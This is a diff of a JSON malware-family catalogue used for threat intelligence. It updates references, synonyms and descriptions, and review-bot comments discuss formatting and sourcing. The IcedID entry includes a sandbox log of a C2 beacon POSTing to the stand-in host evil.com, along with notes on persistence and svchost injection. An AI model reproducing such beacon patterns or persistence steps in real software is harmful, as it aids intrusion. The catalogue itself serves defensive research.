- "Emotet",
- "Heodo"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
 ],
+ "synonyms": [],
 "type": []
 },
- "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
- "value": "Geodo"
+ "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79",
+ "value": "GEMCUTTER"
 },
 {
 "description": "",
@@ -7297,11 +8642,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole",
 "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/",
- "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
- "https://www.coresecurity.com/core-impact"
+ "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf"
 ],
 "synonyms": [
- "CoreImpact (Modified)"
+ "CoreImpact (Modified)",
+ "Gholee"
 ],
 "type": []
 },
@@ -7314,6 +8659,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet",
 "https://en.wikipedia.org/wiki/GhostNet",
+ "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/",
 "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html"
 ],
 "synonyms": [
@@ -7352,7 +8698,8 @@
 "http://www.malware-traffic-analysis.net/2018/01/04/index.html",
 "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/",
 "http://www.hexblog.com/?p=1248",
- "https://blog.cylance.com/the-ghost-dragon"
+ "https://blog.cylance.com/the-ghost-dragon",
+ "https://www.intezer.com/blog-chinaz-relations/"
 ],
 "synonyms": [
 "Gh0st RAT",
@@ -7391,6 +8738,19 @@
 "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c",
 "value": "GlassRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos",
+ "https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d2e0cbfb-c647-48ec-84e2-ca2199cf7d03",
+ "value": "GlitchPOS"
+ },
 {
 "description": "",
 "meta": {
@@ -7672,7 +9032,7 @@
 "value": "Graftor"
 },
 {
- "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
+ "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos",
@@ -7716,6 +9076,19 @@
 "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4",
 "value": "Gravity RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease",
+ "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4ed079e6-69bd-481b-b873-86ced9ded750",
+ "value": "GREASE"
+ },
 {
 "description": "",
 "meta": {
@@ -7731,6 +9104,23 @@
 "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17",
 "value": "GreenShaitan"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy",
+ "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf",
+ "https://www.eset.com/int/greyenergy-exposed/",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://github.com/NozomiNetworks/greyenergy-unpacker"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5a683d4f-31a1-423e-a136-d348910ca967",
+ "value": "GreyEnergy"
+ },
 {
 "description": "",
 "meta": {
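Review bot: The only change to the GratefulPOS description is that the literal `’` is rewritten as `\u2019`, yet the entire string shows up as removed and re-added; the IcedID description in the hunk ending at L81 churns the same way (`“`/`”` becoming `\u201c`/`\u201d`). Both forms decode to identical text, so this is the exporter flipping its escaping mode between runs, not a content change. Pin the serializer to one setting (always raw UTF-8 or always ASCII-escaped) so future diffs of this file show only real edits.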
@@ -7822,6 +9212,8 @@
 "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
 "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
 "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
+ "https://www.uperesia.com/hancitor-packer-demystified",
+ "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
 "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
 "https://boozallenmts.com/resources/news/closer-look-hancitor",
 "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/"
@@ -7880,6 +9272,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger",
+ "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
 "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
 "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
 "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
@@ -7888,6 +9281,7 @@
 "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/"
 ],
 "synonyms": [
+ "HawkEye Reborn",
 "Predator Pain"
 ],
 "type": []
@@ -7914,6 +9308,7 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth",
 "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
 "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
 "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
 ],
@@ -7955,7 +9350,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor",
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+ "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
+ "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html"
 ],
 "synonyms": [],
 "type": []
@@ -7982,6 +9378,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom",
+ "https://blog.dcso.de/enterprise-malware-as-a-service/",
 "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside"
 ],
 "synonyms": [],
@@ -8096,7 +9493,7 @@
 "value": "HLUX"
 },
 {
- "description": "",
+ "description": " a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry",
@@ -8108,6 +9505,20 @@
 "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d",
 "value": "homefry"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hoplight",
+ "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A",
+ "https://www.computing.co.uk/ctg/news/3074007/lazarus-rises-warning-over-new-hoplight-malware-linked-with-north-korea"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3e489132-8687-46b3-b9a7-74ba8fafaddf",
+ "value": "HOPLIGHT"
+ },
 {
 "description": "",
 "meta": {
@@ -8198,7 +9609,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm",
- "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412"
+ "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412",
+ "http://blogs.360.cn/post/analysis-of-apt-c-37.html"
 ],
 "synonyms": [
 "houdini"
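Review bot: The re-added hworm reference in the second hunk keeps a social-media tracking query string (`?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412`) that is not part of the article's address. Since the line is being rewritten anyway, trim it to `"http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/",` so the reference is stable and deduplicates against the other Unit 42 URLs in the file. The formbook list in the hunk ending at L67 carries a similar `?trk=explore_page_resources_recent` suffix on an existing line, though that one is not touched by this commit.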
@@ -8222,19 +9634,23 @@
 "value": "HyperBro"
 },
 {
- "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
+ "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid",
 "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
 "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
 "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid",
+ "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
 "https://www.youtube.com/watch?v=wObF9n2UIAM",
 "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
 "https://www.youtube.com/watch?v=7Dk7NkIbVqY",
+ "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
 "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
 "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/"
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
+ "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/"
 ],
 "synonyms": [
 "BokBot"
@@ -8330,6 +9746,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat",
+ "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
 "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/"
 ],
 "synonyms": [],
@@ -8383,24 +9800,49 @@
 "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420",
 "value": "InvisiMole"
 },
+ {
+ "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
+ "https://www.symantec.com/security-center/writeup/2015-122210-5128-99",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "44599616-3849-4960-9379-05307287ff80",
+ "value": "IRONHALO"
+ },
 {
 "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
- "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
- "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
- "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
+ "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
 "https://lokalhost.pl/gozi_tree.txt",
- "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
 "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
 "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
 "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://www.youtube.com/watch?v=KvOpNznu_3w",
 "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html"
+ "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
+ "http://benkow.cc/DreambotSAS19.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
+ "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
+ "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
+ "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
+ "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
+ "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
+ "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features"
 ],
 "synonyms": [
 "Gozi ISFB",
@@ -8417,7 +9859,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
- "http://www.clearskysec.com/ismagent/"
+ "http://www.clearskysec.com/ismagent/",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/"
 ],
 "synonyms": [],
 "type": []
@@ -8452,6 +9895,19 @@
 "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070",
 "value": "iSpy Keylogger"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye",
+ "https://twitter.com/malwrhunterteam/status/1085162243795369984"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c5cec575-325c-44b8-af24-4feb330eec8a",
+ "value": "IsraBye"
+ },
 {
 "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public",
 "meta": {
@@ -8524,9 +9980,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku",
 "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf",
+ "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/",
 "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146"
 ],
 "synonyms": [
+ "C3PRO-RACOON",
+ "KCNA Infostealer",
 "Reconcyc"
 ],
 "type": []
@@ -8547,6 +10006,20 @@
 "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea",
 "value": "Jasus"
 },
+ {
+ "description": "Ransomware written in Go.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jcry",
+ "https://twitter.com/IdoNaor1/status/1101936940297924608",
+ "https://twitter.com/0xffff0800/status/1102078898320302080"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203",
+ "value": "JCry"
+ },
 {
 "description": "",
 "meta": {
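Review bot: The new IsraBye and JCry entries cite nothing but Twitter status links besides the Malpedia page, and tweets are routinely deleted or made private, which would leave both clusters without a retrievable source. Where a written analysis exists it should be listed first, and otherwise an archived copy of the tweet recorded next to the live link. JCry's description `"Ransomware written in Go."` is also thinner than the file's other non-empty descriptions; a sentence on what the two cited threads establish would make the entry usable on its own.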
@@ -8693,6 +10166,19 @@
 "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf",
 "value": "Karius"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a45c16d9-6945-428c-af46-0436903f9329",
+ "value": "Karkoff"
+ },
 {
 "description": "",
 "meta": {
@@ -8748,6 +10234,41 @@
 "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea",
 "value": "Kelihos"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown",
+ "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/",
+ "https://blog.cystack.net/word-based-malware-attack/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18",
+ "value": "KerrDown"
+ },
+ {
+ "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keybase",
+ "https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/",
+ "https://th3l4b.blogspot.com/2015/10/keybase-loggerclipboardcredsstealer.html",
+ "https://unit42.paloaltonetworks.com/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/",
+ "https://community.rsa.com/community/products/netwitness/blog/2018/02/15/malspam-delivers-keybase-keylogger-2-11-2017",
+ "https://voidsec.com/keybase-en/",
+ "https://www.virusbulletin.com/virusbulletin/2016/07/new-keylogger-block/",
+ "https://isc.sans.edu/forums/diary/Malicious+Office+files+using+fileless+UAC+bypass+to+drop+KEYBASE+malware/22011/"
+ ],
+ "synonyms": [
+ "Kibex"
+ ],
+ "type": []
+ },
+ "uuid": "8a7bb20e-7e90-4330-8f53-744bd5519f6f",
+ "value": "KeyBase"
+ },
 {
 "description": "",
 "meta": {
@@ -8786,7 +10307,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble",
- "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A"
+ "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A",
+ "https://research.checkpoint.com/north-korea-turns-against-russian-targets/"
 ],
